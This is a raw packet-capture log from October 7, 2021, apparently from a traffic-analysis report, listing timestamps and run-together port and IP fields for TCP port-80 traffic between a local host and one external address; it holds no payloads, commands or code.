                                                          Oct 7, 2021 01:32:19.792948961 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793009996 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793201923 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793204069 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793225050 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793241978 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793256998 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793272972 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793272972 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793287992 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793318033 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793323040 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793343067 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793517113 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793574095 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793607950 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793627024 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793663025 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793673038 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793689013 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793706894 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793710947 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793735027 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793756962 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793777943 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793797970 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793800116 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793803930 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793824911 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793828011 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793843985 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793874025 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793895960 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793916941 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793920040 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793945074 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793968916 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.793972015 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.793991089 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.794013023 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.794032097 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.794097900 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.794114113 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.794138908 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.794161081 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.794182062 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.794183016 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.794203997 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.794204950 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.794255018 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.794285059 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.794301987 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.794325113 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.794327974 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.794395924 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.794410944 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.811055899 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.811140060 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.811191082 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.811217070 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.811242104 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.811264992 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.811290026 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.811311960 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.811336994 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.811336994 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.811384916 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.824913025 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.825069904 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.845808983 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.845870972 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.845904112 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.845932961 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.845937967 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.845963001 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.845988989 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.845992088 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.845993996 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.845997095 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.846029997 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.846050978 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.846061945 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.846077919 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.846091032 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.846110106 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.846142054 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.860569000 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.860635042 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.860693932 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.860694885 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.860742092 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.860785007 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.860795975 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.860836029 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.860872984 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.860904932 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.860910892 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.860949039 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.860953093 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.860996008 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.861037016 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.861063957 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.861076117 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.861115932 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.861134052 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.861155987 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.861191034 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.861227989 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.861238956 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.861265898 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.861272097 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.861314058 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.861356020 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.874541044 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.874596119 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.875806093 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.895229101 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895261049 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895276070 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895299911 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895328045 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895355940 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895382881 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895384073 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.895411968 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895446062 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895477057 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895500898 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.895504951 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895533085 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895554066 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895574093 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895595074 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895622969 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.895658970 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895670891 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.895689964 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.895718098 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.895762920 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.911097050 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911155939 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911181927 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911398888 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911425114 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911447048 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911467075 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.911472082 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911494970 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911525011 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911529064 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.911550045 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911566973 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.911572933 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911597013 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911619902 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911628008 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.911642075 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911664963 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911670923 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.911691904 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911720037 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911720037 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.911746025 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911768913 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911777973 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.911792994 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911815882 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911839008 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911854029 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.911864996 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911910057 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911946058 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.911948919 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911983967 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.911988974 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.912015915 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.912046909 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.912074089 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.912077904 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.912107944 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.912138939 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.912139893 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.912169933 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.912199020 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.912209034 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.912242889 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.912273884 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.912280083 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.912306070 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.912342072 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.912417889 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.934746981 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.934819937 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.934885979 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.934885979 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.934937000 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.934983969 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.945647001 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.945672035 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.945780039 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.945811987 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962347984 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962388039 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962412119 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962431908 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962452888 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962459087 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962472916 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962492943 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962507963 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962523937 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962529898 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962544918 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962560892 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962563992 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962580919 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962593079 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962601900 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962621927 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962641954 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962646961 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962661982 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962668896 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962687016 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962708950 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962712049 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962732077 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962750912 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962769985 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962771893 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962789059 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962795973 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962809086 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962829113 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962830067 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962853909 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962876081 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962882996 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962894917 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962928057 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962935925 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962953091 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.962965965 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.962976933 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963001013 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963010073 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.963025093 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963054895 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963082075 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963094950 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.963112116 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963129044 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.963171959 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963203907 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963241100 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963242054 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.963274002 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963311911 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963316917 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.963346958 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963359118 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.963371992 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963396072 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963411093 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.963419914 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.963489056 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.984118938 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.984167099 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.984200954 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.984240055 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.984256029 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.984294891 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.994852066 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.994915962 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.994998932 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.995208979 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.995268106 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.995306969 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.995346069 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.995372057 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.995393038 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.995398045 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.995443106 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.995467901 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.995491982 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.995501995 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.995544910 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.995580912 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.995593071 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.995628119 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.995647907 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.995649099 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.995704889 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.000814915 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.000905991 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.000965118 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.001013994 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.001020908 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.001055956 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.002638102 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.012643099 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.012754917 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.012774944 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.012794018 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.012809992 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.012826920 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.012842894 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.012860060 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.012876034 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.012891054 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.012911081 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.012928963 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.012986898 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013016939 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013034105 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013061047 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.013109922 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013129950 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013148069 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013164997 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013181925 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013228893 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013243914 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013263941 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013288975 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.013300896 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.013305902 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.013319969 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.013401031 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013420105 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013437033 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013452053 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013483047 CEST4977880192.168.2.4194.147.86.221
